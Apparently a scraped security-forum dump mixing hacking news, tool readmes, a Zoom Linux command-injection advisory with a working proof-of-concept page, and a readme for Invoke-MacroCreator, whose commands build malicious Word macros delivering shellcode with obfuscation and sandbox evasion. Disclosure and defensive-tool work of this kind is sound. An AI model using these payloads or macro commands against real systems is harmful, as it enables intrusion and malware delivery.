Fi8sVrs

wanakiwi Introduction This utility allows machines infected by the WannaCry ransomware to recover their files. wanakiwi is based on wanadecrypt which makes possible for lucky users to : Recover the private user key in memory to save it as 00000000.dky Decrypt all of their files The Primes extraction method is based on Adrien Guinet's wannakey which consist of scanning the WannaCry process memory to recover the prime numbers that were not cleaned during CryptReleaseContext(). Adrien's method was originally described as only valid for Windows XP but @msuiche and I proved this can be extended to Windows 7. Usage Process access wanakiwi.exe [/pid:PID|/process:program.exe] pid or process are optional parameters, by default the utility will look for any of this process: wnry.exe wcry.exe data_1.exe ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe tasksche.exe Limitations Given the fact this method relies on scanning the address space of the process that generated those keys, this means that if this process had been killed by, for instance, a reboot - the original process memory will be lost. It is very important for users to NOT reboot their system before trying this tool. Secondly, because of the same reason we do not know how long the prime numbers will be kept in the address space before being reused by the process. This is why it is important to try this utility ASAP. This is not a perfect tool, but this has been so far the best solution for victims who had no backup. Compatibility O.S. x86 x64 Windows XP ? Windows 2003 ? Windows 7 ? Frequently Asked Questions (F.A.Q.) Does it modify the original encrypted files ? No, the original encrypted files (.WNCRY) remain unmodified. The decrypted files are generated as separate files. Does it work on an infected machine that had been rebooted or shutdown ? No, the whole point is to be able to analyze the process memory of the process which created the keys. If it had been shutdown or rebooted, this memory state is lost. What about hibernated machines ? Yes, when you hibernate your machine it actually saves the state of memory on disk which allows to keep the process memory state. In those scenarios, a machine which has been hibernated for multiple days has her memory state intact and identical to the day it hibernated. Which actually raises your chances of file recovery. What shall we do after recovering our files ? We strongly recommend you to immediately back up those decovered files on an external empty disk before rebooting or shutting down your machine - including the 00000000.dky file generated by wanakiwi which is the decryption key. Once you backed-up up your recovered files, we recommend you to reinstall a fresh version of Windows. Acknowledgement This product includes software developed by the OpenSSL Project for use in the OpenSSL Toolkit (http://www.openssl.org/) With BIG thanks and love to: @msuiche <3 @halsten @malwareunicorn @adriengnt Download: wanakiwi-master.zip Resources: https://blog.comae.io/wannacry-decrypting-files-with-wanakiwi-demo-86bafb81112d https://github.com/gentilkiwi/wanakiwi

Learn programming and devops in live environment anytime, anywhere A Beginner's Guide to LabEx If you are interested in programming but don't know where and how to get started, this course will show you the basic computer-related knowledge and how you can utilize LabEx's live environment to excel in IT by doing real practices. Stat Lab Linux Tutorial LabEx's experimental environment is based on Linux. If you are familiar with Linux then you can skip this tutorial and start exploring LabEx right away. If Linux sounds new to you, please follow every step in this tutorial. This course covers all the basic concepts you need to know. Start Lab Scrapy Tutorial: Web Scrapying LabEx and Github Scrapy uses an open source scraper framework implemented by Python. With the principle of "Do not Repeat Yourself", Scrapy provides a set of solutions for preparing the basic framework for scrapers and writing common problems in the process. This course will use LabEx and Github as examples to demonstrate how to complete a series of actions and commands. Start Lab More Courses Source: https://labex.io/

Bitcoin's value hit a high of more than $19,000 this year prompting attacks by hackers A crypto-currency exchange in South Korea is shutting down after it was hacked for the second time in less than eight months. Youbit, which lets people buy and sell bitcoins and other virtual currencies, has filed for bankruptcy after losing 17% of its assets in the cyber-attack. It did not disclose how much the assets were worth at the time of the attack. In April, Youbit, formerly called Bithumb , lost 4,000 bitcoins now worth $73m (£55m) to Kisa. Crime wave South Korea's Internet and Security Agency (Kisa) which investigates net crime, said it had started an enquiry into how the thieves gained access to the exchange's core systems. Kisa blamed the earlier attack on Youbit on cyber-spies working for North Korea. Separate, more recent, attacks on the Bithumb and Coinis exchanges, have also been blamed on the regime. No information has been released about who might have been behind the latest Youbit attack. In a statement, Youbit said that customers would get back about 75% of the value of the crypto-currency they have lodged with the exchange. It said it was "very sorry" that it had been forced to shut down. The exchange added that the hackers did not manage to steal all the digital cash it held because a lot was lodged in a "cold wallet" - a secure store used to hold the assets that were not being traded. Youbit was one of the smaller exchanges active in South Korea. The majority of Bitcoin trading in the country is done on the Bithumb exchange which has a 70% market share. More and more cybercriminals have tried to cash in on the boom in virtual currencies such as Bitcoin. Many have created malware that seeks to use victims' computers to create or "mine" valuable currencies. Others have simply attacked exchanges and other crypto-cash service firms to get at large numbers of bitcoins at once. Earlier this month, hackers got away with more than $80m in bitcoins from NiceHash, a Slovenia-based mining exchange. Via bbc.com

Security researchers have discovered and disclosed details of two unpatched critical vulnerabilities in a popular internet forum software—vBulletin—one of which could allow a remote attacker to execute malicious code on the latest version of vBulletin application server. vBulletin is a widely used proprietary Internet forum software package based on PHP and MySQL database server. It powers more than 100,000 websites on the Internet, including Fortune 500 and Alexa Top 1 million companies websites and forums. The vulnerabilities were discovered by a security researcher from Italy-based security firm TRUEL IT and an unknown independent security researcher, who disclosed the details of the vulnerabilities by Beyond Security's SecuriTeam Secure Disclosure program. The vulnerabilities affect version 5 of the vBulletin forum software and are currently unpatched. Beyond Security claims, it tried to contact vBulletin since November 21, 2017, but received no response from the company. vBulletin Remote Code Execution Vulnerability The first vulnerability discovered in vBulletin is a file inclusion issue that leads to remote code execution, allowing a remote attacker to include any file from the vBulletin server and execute arbitrary PHP code. An unauthenticated attacker can trigger the file inclusion vulnerability by sending a GET request to index.php with the routestring= parameter in the request, eventually allowing the attacker to "create a crafted request to Vbulletin server installed on Windows OS and include any file on the web server." The researcher has also provided Proof-of-Concept (PoC) exploit code to show the exploitation of the vulnerability. A Common Vulnerabilities and Exposures (CVE) number has not been assigned to this particular vulnerability. vBulletin Remote Arbitrary File Deletion Vulnerability The second vulnerability discovered in the vBulletin forum software version 5 has been assigned CVE-2017-17672 and described as a deserialization issue that an unauthenticated attacker can exploit to delete arbitrary files and even execute malicious code "under certain circumstances." The vulnerability is due to unsafe usage of PHP's unserialize() on user-supplied input, which allows an unauthenticated hacker to delete arbitrary files and possibly execute arbitrary code on a vBulletin installation. A publicly exposed API, called vB_Library_Template's cacheTemplates() function, allows fetching information on a set of given templates from the database to store them inside a cache variable. Besides technical details, the advisory also includes Proof-of-Concept (PoC) exploit code to explain the severity of this vulnerability. We expect the vendor to release the patch for both the security flaws before hackers started exploiting them to target vBulletin installations. Source: thehackernews.com

The binary /opt/zoom/ZoomLauncher is vulnerable to command injection because it uses user input to construct a shell command without proper sanitization. The client registers a scheme handler (zoommtg://) and this makes possible to trigger the vulnerability remotely. Version 2.0.106600.0904 is affected. Zoom Linux Client Command Injection Vulnerability (RCE) 1. Advisory Information Conviso Advisory ID: CONVISO-17-003 CVE ID: CVE-2017-15049 CVSS v2: 10, (AV:N/AC:L/Au:N/C:C/I:C/A:C) Date: 2017-10-01 2. Affected Components Zoom client for Linux, version 2.0.106600.0904 (zoom_amd64.deb). Other versions may be vulnerable. 3. Description The binary /opt/zoom/ZoomLauncher is vulnerable to command injection because it uses user input to construct a shell command without proper sanitization. The client registers a scheme handler (zoommtg://) and this makes possible to trigger the vulnerability remotely. 4. Details gef> r '$(uname)' Starting program: /opt/zoom/ZoomLauncher '$(uname)' ZoomLauncher started. cmd line: $(uname) $HOME = /home/user Breakpoint 5, 0x0000000000401e1f in startZoom(char*, char*) () gef> x/3i $pc => 0x401e1f <_Z9startZoomPcS_+744>: call 0x4010f0 <strcat@plt> 0x401e24 <_Z9startZoomPcS_+749>: lea rax,[rbp-0x1420] 0x401e2b <_Z9startZoomPcS_+756>: mov rcx,0xffffffffffffffff gef> x/s $rdi 0x7fffffffbf10: "export SSB_HOME=/home/user/.zoom; export QSG_INFO=1; export LD_LIBRARY_PATH=/opt/zoom;/opt/zoom/zoom \"" gef> x/s $rsi 0x7fffffffd750: "$(uname) " gef> c Continuing. export SSB_HOME=/home/user/.zoom; export QSG_INFO=1; export LD_LIBRARY_PATH=/opt/zoom;/opt/zoom/zoom "$(uname) " Breakpoint 6, 0x0000000000401e82 in startZoom(char*, char*) () gef> x/3i $pc => 0x401e82 <_Z9startZoomPcS_+843>: call 0x401040 <system@plt> 0x401e87 <_Z9startZoomPcS_+848>: mov DWORD PTR [rbp-0x18],eax 0x401e8a <_Z9startZoomPcS_+851>: mov eax,DWORD PTR [rbp-0x18] gef> x/s $rdi 0x7fffffffbf10: "export SSB_HOME=/home/user/.zoom; export QSG_INFO=1; export LD_LIBRARY_PATH=/opt/zoom;/opt/zoom/zoom \"$(uname) \"" --- RCE POC --- <html> <head> </head> <body> <h1>Zoom POC RCE</h1> <script> window.location = 'zoommtg://$(gnome-calculator${IFS}-e${IFS}1337)' </script> <body> </html> 5. Solution Upgrade to latest version. 6. Credits Ricardo Silva <rsilva@conviso.com.br> Gabriel Quadros <gquadros@conviso.com.br> 7. Report Timeline Set 28, 2017 - Conviso sent first email asking for a channel to discuss the vulnerability. Set 28, 2017 - Vendor asked the report in the current channel. Set 28, 2017 - Conviso sent informations to reproduce the vulnerability. Set 28, 2017 - Conviso asked if they could reproduce it. Set 28, 2017 - Vendor replied saying that the informations were forwarded to engineering team. Oct 5, 2017 - Vendor provided a patch candidate for testing. Oct 5, 2017 - Conviso pointed problems in the patch. Oct 11, 2017 - Vendor provided a patch candidate for testing. Oct 12, 2017 - Conviso pointed problems in the patch. Oct 23, 2017 - Conviso asked for status. Oct 27, 2017 - Conviso asked for status. Nov 1, 2017 - Conviso asked for status. Nov 3, 2017 - Vendor replied. Nov 6, 2017 - Conviso asked for status. Nov 6, 2017 - Vendor replied. Nov 9, 2017 - Conviso asked for status. Nov 13, 2017 - Conviso asked for status. Nov 15, 2017 - Conviso asked for status. Nov 16, 2017 - Vendor provided a patch candidate for testing. Nov 16, 2017 - The patch seems to fix the attack vector, although no further research was done. Nov 20, 2017 - Vendor thanked and marked the issue as solved, considering the patch as a sastifactory fix. Nov 30, 2017 - Vendor released the version 2.0.115900.1201 8. References https://zoom.us/download https://support.zoom.us/hc/en-us/articles/205759689-New-Updates-for-Linux 9. About Conviso Conviso is a consulting company specialized on application security. Our values are based on the allocation of the adequate competencies on the field, a clear and direct speech with the market, collaboration and partnership with our customers and business partners and constant investments on methodology and research improvement. For more information about our company and services provided, please check our website at www.conviso.com.br. 10. Copyright and Disclaimer The information in this advisory is Copyright 2017 Conviso Application Security S/A and provided so that the society can understand the risk they may be facing by running affected software, hardware or other components used on their systems. In case you wish to copy information from this advisory, you must either copy all of it or refer to this document (including our URL). No guarantee is provided for the accuracy of this information, or damage you may cause your systems in testing. # 0day.today [2017-12-18] # Source: 0day.today

intentia conteaza, mail trimis;

Macro Creator Author: Arno0x0x - @Arno0x0x Invoke-MacroCreator is a powershell Cmdlet that allows for the creation of an MS-Word document embedding a VBA macro with various payload delivery and execution capabilities. Description Basically the script supports three types of payload that you MUST specify using the -t argument: shellcode: any raw shellcode (for instance created with msfvenom). The shellcode is loaded into memory then loaded into the MS-Word process space and executed. file: any type of file (executable, script, whatever...). The file is first saved to a local temporary directory then called thanks to a command line specified as an argument. command: any command line to be executed In either case, the payload itself must be a file (even a command type payload should be in a file). The file is specified using the -i argument. Those payloads can be delivered through several delivery methods that you MUST specify using the -d argument: body: the payload is embedded into the body of the MS-Word document in an encoded form. This comes with a limit in terms of size of file that can be embedded. comment: the payload is embedded into the comment of the MS-Word document in a base64 encoded form. This technique is inspired by Invoke-Commentator. webdav: the payload is downloaded over a specific WebDAV covert channel (PROPFIND only) and requires a tool at the server side counter part: WebDavDelivery. The process seen performing network traffic is 'svchost.exe'. biblio: aka "Bibliograpy sources". The payload is embedded in a bibliography sources XML file and then loaded over HTTP(S). The generated 'sources.xml' file must be hosted on a web server. The process seen performing network traffic is 'word.exe'. html (using IE): the payload is embedded into a simple HTML file and then downloaded over HTTP(S) from an Internet Explorer COM object. The generated 'index.html' file must be hosted on a web server. The process seen performing network traffic is 'iexplorer.exe' dns : the payload is downloaded over a DNS request covert channel, in several chunks that are reassembled in memory. It is required to own a domain name and to use the DNSDelivery tool. When using DNSDelivery with Invoke-MacroCreator, the type of payload to deliver doesn't matter as it is not consummed by the macro. In other words: set it to whatever you want. If the payload type is a file, use the -c option to define how the file should be called or executed. If the delivery method is webdav, biblio or html, you can set the UNC/URL to use with the -url option. If you don't set this UNC/URL, the default parameters defined in the script's global variables section are used. If the delivery method is dns, use the -dn option to set the domain name to be used. If you don't set this domain name, the default one defined in the script's global variables section is used. When a command is to be executed (file or cmd payload), three different execution methods are available that can be choosen using the -m switch. [Optionnal] Using the optionnal -o switch, some level of obfuscation is applied on parts of the macro. Obfuscation is applied on: Variable names (in the template files, all variable surrounded by '_'. ex: _varName_) Function names (in the template files, all functions surrounded by '#'. ex: #FunctionName#) All string parameters (in the template files, all strings surrounded by '-'. ex: -"any string"-) [Optionnal] Using the optionnal -e switch, some sandbox evasion technique can also be included. If a sandbox is being detected, the payload is not executed and the macro stops. [Optionnal] Using the optionnal -a switch, auto open functions are added so that the macro is executed automatically when the document is opened. This is what you want for an "effective" attack, but probably not for testing/debugging purposes. Dependencies Invoke-MacroCreator requires a proper installation of Microsoft Word. Examples: Here are some sample examples: Shellcode embedded in the body of the MS-Word document, no obfuscation, no sandbox evasion: C:\PS> Invoke-MacroCreator -i meterpreter_shellcode.raw -t shellcode -d body Shellcode delivered over WebDAV covert channel, with obfuscation, no sandbox evasion: C:\PS> Invoke-MacroCreator -i meterpreter_shellcode.raw -t shellcode -url webdavserver.com -d webdav -o Scriptlet delivered over bibliography source covert channel, with obfuscation, with sandbox evasion: C:\PS> Invoke-MacroCreator -i regsvr32.sct -t file -url 'http://my.server.com/sources.xml' -d biblio -c 'regsvr32 /u /n /s /i:regsvr32.sct scrobj.dll' -o -e Executable delivered over WebDAV covert channel, using default UNC, no obfuscation, with sandbox evasion, using execution method 3: C:\PS> Invoke-MacroCreator -i badass.exe -p file -t webdav -c 'badass.exe' -e -m 3 Command line embedded in the body of the MS-Word document, with obfuscation, no sandbox evasion, using execution method 1: C:\PS> Invoke-MacroCreator -i my_cmd.bat -p cmd -t body -o -m 1 Shellcode embedded in a comment of the MS-Word document, no obfuscation, no sandbox evasion, adding auto-open functions: C:\PS> Invoke-MacroCreator -i meterpreter_shellcode.raw -t shellcode -d comment -a Shellcode delivered over the DNS delivery covert channel using domain "mydomain.com", with obfuscation, no sandbox evasion: C:\PS> Invoke-MacroCreator -i meterpreter_shellcode.raw -t shellcode -d dns -dn mydomain.com -o Download: Invoke-MacroCreator.ps1 MacroCreatorTemplates.ps1 Source: https://github.com/Arno0x/PowerShellScripts/tree/master/MacroCreator

What Droidefense is Droidefense (originally named atom: analysis through observation machine)* is the codename for android apps/malware analysis/reversing tool. It was built focused on security issues and tricks that malware researcher have on they every day work. For those situations on where the malware has anti-analysis routines, Droidefense attemps to bypass them in order to get to the code and 'bad boy' routine. Sometimes those techniques can be virtual machine detection, emulator detection, self certificate checking, pipes detection. tracer pid check, and so on. Droidefense uses an innovative idea in where the code is not decompiled rather than viewed. This allow us to get the global view of the execution workflow of the code with a 100% accuracy on gathered information. With this situation, Droidefense generates a fancy html report with the results for an easy understanding. Usage TL;DR java -jar droidefense-cli-1.0-SNAPSHOT.jar -i /path/to/your/sample.apk Detailed usage java -jar droidefense-cli-1.0-SNAPSHOT.jar ________ .__ .___ _____ \______ \_______ ____ |__| __| _/_____/ ____\____ ____ ______ ____ | | \_ __ \/ _ \| |/ __ |/ __ \ __\/ __ \ / \ / ___// __ \ | ` \ | \( <_> ) / /_/ \ ___/| | \ ___/| | \\___ \\ ___/ /_______ /__| \____/|__\____ |\___ >__| \___ >___| /____ >\___ > \/ \/ \/ \/ \/ \/ \/ * Current build: 2017_12_05__12_07_01 * Check out on Github: https://github.com/droidefense/ * Report your issue: https://github.com/droidefense/engine/issues * Lead developer: @zerjioang usage: droidefense -d,--debug print debugging information -h,--help print this message -i,--input <apk> input .apk to be analyzed -o,--output <format> select prefered output: json json.min html -p,--profile Wait for JVM profiler -s,--show show generated report after scan -u,--unpacker <unpacker> select prefered unpacker: zip memapktool -v,--verbose be verbose -V,--version show current version information Useful info Checkout how to compile new version at: https://github.com/droidefense/engine/wiki/Compilation Checkout report example at: https://github.com/droidefense/engine/wiki/Pornoplayer-report Checkout execution logs at: https://github.com/droidefense/engine/wiki/Execution-logs Contribuiting Everybody is welcome to contribute to DROIDEFENSE. Please check out the DROIDEFENSE Contribution Steps for instructions about how to proceed. And any other comments will be very appreciate. Citing Feel free to cite droidefense on your works. We added next boilerplate for your references: @Manual{, title = {Droidefense: Advance Android Malware Analysis Framework}, author = {{zerjioang}}, organization = {opensource}, address = {Bilbao, Spain}, year = 2017, url = {https://droidefense.wordpress.com/} } License All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. Uses GPL license described below This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. Latest release Download Source: https://github.com/droidefense/engine

Symantec Hackers utilizing the Triton malware have managed to close down industrial operations in the Middle East, researchers have warned. On Thursday, cybersecurity researchers from FireEye's Mandiant revealed that threat actors deployed malware capable of manipulating emergency shutdown systems at a critical infrastructure firm in the Middle East. The new form of malware, dubbed Triton, is one of only a handful of malware families known to have been developed for the purpose of attacking industrial processes and core infrastructure we all rely upon for supplies such as gas, oil, and electricity. Stuxnet was one of the first indicators that such malware exists after the worm was used against industrial players in Iran in 2010, and in 2014, a South Korean nuclear facility was targeted. In 2016, Ukraine's capital Kiev had a power outage after malware took down a power grid. The new Trojan, which Symantec researchers say has been active since at least August this year, has been designed to communicate with a specific type of industrial control system (ICS), namely safety instrumented systems (SIS) controllers produced by Triconex. Triton is an attack framework built to tamper with such controllers by communicating with them through computers using the Microsoft Windows operating system. According to Symantec -- while it is early days into the investigation -- the malware appears to inject code which modifies the behavior of SIS devices, leading to threat actor control and potential damage. In the case of the victim company, Triton was used to target emergency shutdown capabilities. However, the security researchers believe Triton was intended for use in "causing physical damage," but the plant was shut down inadvertently during the attack instead. The malware was deployed in order to reprogram the SIS controllers but some of the devices entered a failed safe state which closed the plant down and alerted operators to the scheme. The majority of cyberattackers have money in mind when they deploy malware or infiltrate systems, whether it be to clear out customer accounts or to steal valuable corporate data. However, in this case, there was no clear financial goal -- but the groups' persistence, skill, the targeting of core infrastructure, and what appears to be resources at their disposal all points towards state sponsorship. In October, the FBI and US Department of Homeland Security (DHS) warned that energy companies are now under constant attack by threat actors seeking to steal information related to their control systems. Firms in the energy, nuclear, water, aviation, and critical manufacturing sectors are at risk, according to the agencies, from hackers which target small firms as stepping stones towards more valuable companies. Via zdnet.com

Security researchers have publicly disclosed an unpatched zero-day vulnerability in the firmware of AT&T DirecTV WVB kit after trying to get the device manufacturer to patch this easy-to-exploit flaw over the past few months. The problem is with a core component of the Genie DVR system that's shipped free of cost with DirecTV and can be easily exploited by hackers to gain root access and take full control of the device, placing millions of people who've signed up to DirecTV service at risk. The vulnerability actually resides in WVBR0-25—a Linux-powered wireless video bridge manufactured by Linksys that AT&T provides to its new customers. DirecTV Wireless Video Bridge WVBR0-25 allows the main Genie DVR to communicate over the air with customers' Genie client boxes (up to 8) that are plugged into their TVs around the home. Trend Micro researcher Ricky Lawshae, who is also a DirecTV customer, decided to take a closer look at the device and found that Linksys WVBR0-25 hands out internal diagnostic information from the device's web server, without requiring any authentication. When trying to browse to the wireless bridge's web server on the device, Lawshae was expecting a login page or similar, but instead, he found "a wall of text streaming before [his] eyes." Once there, Lawshae was able to see the output of several diagnostic scripts containing everything about the DirecTV Wireless Video Bridge, including the WPS pin, connected clients, running processes, and much more. What's more worrisome was that the device was accepting his commands remotely and that too at the "root" level, meaning Lawshae could have run software, exfiltrate data, encrypt files, and do almost anything he wanted on the Linksys device. Lawshae also provided a video, demonstrating how a quick and straightforward hack let anyone get a root shell on the DirecTV wireless box in less than 30 seconds, granting them full remote unauthenticated admin control over the device. The vulnerability was reported by the ZDI Initiative to Linksys more than six months ago, but the vendor ceased communication with the researcher and had yet not fixed the problem, leaving this easy-to-exploit vulnerability unpatched and open for hackers. So, after over half a year, ZDI decided to publicize the zero-day vulnerability, and recommended users to limit their devices that can interact with Linksys WVBR0-25 "to those that actually need to reach" in order to protect themselves. Via thehackernews.com

se vede ca naiba pe tema alba

macOS and iOS suffer from a kernel double free vulnerability due to IOSurfaceRootUserClient not respecting MIG ownership rules. advisory-info.txt iOS/MacOS kernel double free due to IOSurfaceRootUserClient not respecting MIG ownership rules CVE-2017-13861 I have previously detailed the lifetime management paradigms in MIG in the writeups for: CVE-2016-7612 [<a href="https://bugs.chromium.org/p/project-zero/issues/detail?id=926" title="" class="" rel="nofollow">https://bugs.chromium.org/p/project-zero/issues/detail?id=926</a>] and CVE-2016-7633 [<a href="https://bugs.chromium.org/p/project-zero/issues/detail?id=954" title="" class="" rel="nofollow">https://bugs.chromium.org/p/project-zero/issues/detail?id=954</a>] If a MIG method returns KERN_SUCCESS it means that the method took ownership of *all* the arguments passed to it. If a MIG method returns an error code, then it took ownership of *none* of the arguments passed to it. If an IOKit userclient external method takes an async wake mach port argument then the lifetime of the reference on that mach port passed to the external method will be managed by MIG semantics. If the external method returns an error then MIG will assume that the reference was not consumed by the external method and as such the MIG generated coode will drop a reference on the port. IOSurfaceRootUserClient external method 17 (s_set_surface_notify) will drop a reference on the wake_port (via IOUserClient::releaseAsyncReference64) then return an error code if the client has previously registered a port with the same callback function. The external method's error return value propagates via the return value of is_io_connect_async_method back to the MIG generated code which will drop a futher reference on the wake_port when only one was taken. This bug is reachable from the iOS app sandbox as demonstrated by this PoC. Tested on iOS 11.0.3 (11A432) on iPhone 6s (MKQL2CN/A) Tested on MacOS 10.13 (17A365) on MacBookAir5,2 This bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available, the bug report will become visible to the public. Found by: ianbeer Download GS20171212052309.tgz (2.1 KB) https://packetstormsecurity.com/files/145365/macOS-iOS-Kernel-IOSurfaceRootUserClient-Double-Free.html

ShellcodeToAssembly Replace in shellcodetoasm.py with your shellcode. { Endian type is little endian. } shellcode = '' Installation git clone https://github.com/blacknbunny/ShellcodeToAssembly.git && cd ShellcodeToAssembly/ && pip2 install -r requirements.txt && python2 shellcodetoasm.py Modules manual installation pip install -r requirements.txt it can be pip2 install -r requirements.txt Usage python2 shellcodetoasm.py [returnbit] [architecture] [assembly-flavor] For example python2 shellcodetoasm.py 32 x86 att python2 shellcodetoasm.py 64 x86 Second one is auto intel Arhictectures ARM ARM64 MIPS ppc X86 Return Bit 32 64 Assembly Flavor ATT INTEL Demo: https://asciinema.org/a/xjWrXfftZS7BvSzVRd44LuzkP Download: ShellcodeToAssembly-master.zip or git clone https://github.com/blacknbunny/ShellcodeToAssembly.git Source: https://github.com/blacknbunny/ShellcodeToAssembly

incearca la http://www.darkdog-energydrink.com/ energizante, suplimente, etc.. despre ce sume este vorba?

liniștea dinaintea furtunii!

//deleted

About SeKey is a SSH Agent that allow users to authenticate to UNIX/Linux SSH servers using the Secure Enclave How it Works? The Secure Enclave is a hardware-based key manager that’s isolated from the main processor to provide an extra layer of security. When you store a private key in the Secure Enclave, you never actually handle the key, making it difficult for the key to become compromised. Instead, you instruct the Secure Enclave to create the key, securely store it, and perform operations with it. You receive only the output of these operations, such as encrypted data or a cryptographic signature verification outcome. Limitations Only support MacBook Pro with the Touch Bar and Touch ID Can’t import preexisting key Stores only 256-bit elliptic curve private key Install & Usage Download: sekey-master.zip Source: https://github.com/ntrippar/sekey

Pancake is a CLI/Emacs web/gopher/file browser. It utilizes pandoc and external downloaders such as curl, adding support for Gopher directories and plain text files, and invoking external applications (e.g., image and PDF viewers) depending on its configuration. User interaction capabilities are rather basic, as it is intended to be combined with software that provides better user interfaces – such as emacs, rlwrap, tmux, screen. cgit: https://git.uberspace.net/pancake/ github: https://github.com/defanor/pancake.git source distribution: pancake-0.1.7.tar.gz binaries (Linux, amd64): pancake-0.1.7-bin.tgz Debian binary package (amd64): pancake-0.1.7.deb See README for more information. 1. Other text-based web/gopher browsers Wikipedia lists a few major text-based web browsers, including Emacs-based ones. Pancake provides a combination of the things I liked about those, and the ones I have missed in those: Multi-protocol support (via curl or other pluggable downloaders). Multi-format support (via pandoc). Plain CLI. An Emacs interface without unnecessary blocking, and general support for embedding. Simplicity and small codebase, thanks to reusing the programs mentioned above. Efficient UI. Use of external programs to handle file types which it doesn't support. There are some drawbacks as well: A large executable file (70+ Mio uncompressed). Not as hackable in Elisp as pure (or mostly) Elisp browsers. Not as portable as C or Elisp ones. A relatively small set of features. Somewhat worse HTML parsing and rendering in some cases. Quite possibly more, depending on one's preferences. 2. Installation 2.1 Pancake cabal install would build and install pancake and its documentation. Alternatively, basic Debian packages and binary releases are available. 2.2 Emacs interface M-x package-install-file RET /path/to/pancake.el RET. To set it as your default emacs browser: (require 'pancake) (setq browse-url-browser-function 'pancake-browse-url) To load and show all images automatically (not just after saving them manually): (add-hook 'pancake-display-hook 'pancake-load-images) Though it might be desirable to write a wrapper to only show those on specific websites, e.g. webcomics, and perhaps specific images only. 3. Screenshots https://defanor.uberspace.net/projects/pancake/

debugProxy is a HTTP/S proxy server that can be used by any device that supports using HTTP Proxy servers. Aditionally it is a web application that allows you to view, pause and modify traffic sent through the proxy. This means, for example, you can use debugProxy on your computer or tablet to view the traffic being sent from your phone or IOT device. For information on configuring devices or applications to use debugProxy have a look at our documentation pages. cURL If you have the curl program installed on your computer, you can test if the proxy works with this command: curl https://www.google.com/ --insecure --proxy fagiq:rhrnx@debugproxy.com:8080 If this command works as expected the requests and responses will be on the dashboard. SSL Traffic The proxy just works for HTTP requests, however to make HTTPS and HTTP2 requests a root certificate needs to be downloaded and installed. The debugProxy root certificates can be found on the certificates page. On most smart phones you can install the debugProxy root certificate by simply clicking on the certificate for your device. Try it now! Source: https://debugproxy.com/

HP has an awful history of 'accidentally' leaving keyloggers onto its customers' laptops. At least two times this year, HP laptops were caught with pre-installed keylogger or spyware applications. I was following a tweet made by a security researcher claiming to have found a built-in keylogger in several HP laptops, and now he went public with his findings. A security researcher who goes by the name of ZwClose discovered a keylogger in several Hewlett-Packard (HP) laptops that could allow hackers to record your every keystroke and steal sensitive data, including passwords, account information, and credit card details. The Keylogger was found embedded in the SynTP.sys file, a part of Synaptics touchpad driver that ships with HP notebook computers, leaving more than 460 HP Notebook models vulnerable to hackers. Although the keylogger component is disabled by default, hackers can make use of available open source tools for bypassing User Account Control (UAC) to enable built-in keylogger "by setting a registry value." Here’s the location of the registry key: HKLM\Software\Synaptics\%ProductName% HKLM\Software\Synaptics\%ProductName%\Default The researcher reported the keylogger component to HP last month, and the company acknowledges the presence of keylogger, saying it was actually "a debug trace" which was left accidentally, but has now been removed. The company has released a Driver update for all the affected HP Notebook Models. If you own an HP laptop, you can look for updates for your model. The list of affected HP notebooks can be found at the HP Support website. This is not the very first time when a keylogger has been detected in HP laptops. In May this year, a built-in keylogger was found in an HP audio driver that was silently recording all of its users' keystrokes and storing them in a human-readable file. Get the list of affected hardware and patch here: https://support.hp.com/us-en/document/c05827409 Via thehackernews.com

99.9 % Up-time Gaurantee Unlimited Bandwidth 1 GBPS Port Pre-Installed Software Available .vandut

A team of security researchers has discovered a new malware evasion technique that could help malware authors defeat most of the modern antivirus solutions and forensic tools. Dubbed Process Doppelgänging, the new fileless code injection technique takes advantage of a built-in Windows function and an undocumented implementation of Windows process loader. Ensilo security researchers Tal Liberman and Eugene Kogan, who discovered the Process Doppelgänging attack, presented their findings today at Black Hat 2017 Security conference held in London. Process Doppelgänging Works on All Windows Versions Apparently, Process Doppelgänging attack works on all modern versions of Microsoft Windows operating system, starting from Windows Vista to the latest version of Windows 10. Tal Liberman, the head of the research team at enSilo, told The Hacker New that this malware evasion technique is similar to Process Hollowing—a method first introduced years ago by attackers to defeat the mitigation capabilities of security products. In Process Hollowing attack, hackers replace the memory of a legitimate process with a malicious code so that the second code runs instead of the original, tricking process monitoring tools and antivirus into believing that the original process is running. Since all modern antivirus and security products have been upgraded to detect Process Hollowing attacks, use of this technique is not a great idea anymore. On the other hand, Process Doppelgänging is an entirely different approach to achieve the same, by abusing Windows NTFS Transactions and an outdated implementation of Windows process loader, which was originally designed for Windows XP, but carried throughout all later versions of Windows. Here's How the Process Doppelgänging Attack Works: Before going further on how this new code injection attack works, you need to understand what Windows NTFS Transaction is and how an attacker could leverage it to evade his malicious actions. NTFS Transaction is a feature of Windows that brings the concept of atomic transactions to the NTFS file system, allowing files and directories to be created, modified, renamed, and deleted atomically. NTFS Transaction is an isolated space that allows Windows application developers to write file-output routines that are guaranteed to either succeed completely or fail completely. According to the researcher, Process Doppelgänging is a fileless attack and works in four major steps as mentioned below: Transact—process a legitimate executable into the NTFS transaction and then overwrite it with a malicious file. Load—create a memory section from the modified (malicious) file. Rollback—rollback the transaction (deliberately failing the transaction), resulting in the removal of all the changes in the legitimate executable in a way they never existed. Animate—bring the doppelganger to life. Use the older implementation of Windows process loader to create a process with the previously created memory section (in step 2), which is actually malicious and never saved to disk, "making it invisible to most recording tools such as modern EDRs." Process Doppelgänging Evades Detection from Most Antiviruses Liberman told The Hacker News that during their research they tested their attack on security products from Windows Defender, Kaspersky Labs, ESET NOD32, Symantec, Trend Micro, Avast, McAfee, AVG, Panda, and even advance forensic tools. In order to demonstrate, the researchers used Mimikatz, a post-exploitation tool that helps extract credentials from the affected systems, with Process Doppelgänging to bypass antivirus detection. When the researchers ran Mimikatz generally on a Windows operating system, Symantec antivirus solution caught the tool immediately, as shown below: However, Mimikatz ran stealthy, without antivirus displaying any warning when executed using Process Doppelgänging, as shown in the image at top of this article. Liberman also told us that Process Doppelgänging works on even the latest version of Windows 10, except Windows 10 Redstone and Fall Creators Update, released earlier this year. But due to a different bug in Windows 10 Redstone and Fall Creators Update, using Process Doppelgänging causes BSOD (blue screen of death), which crashes users' computers. Ironically, the crash bug 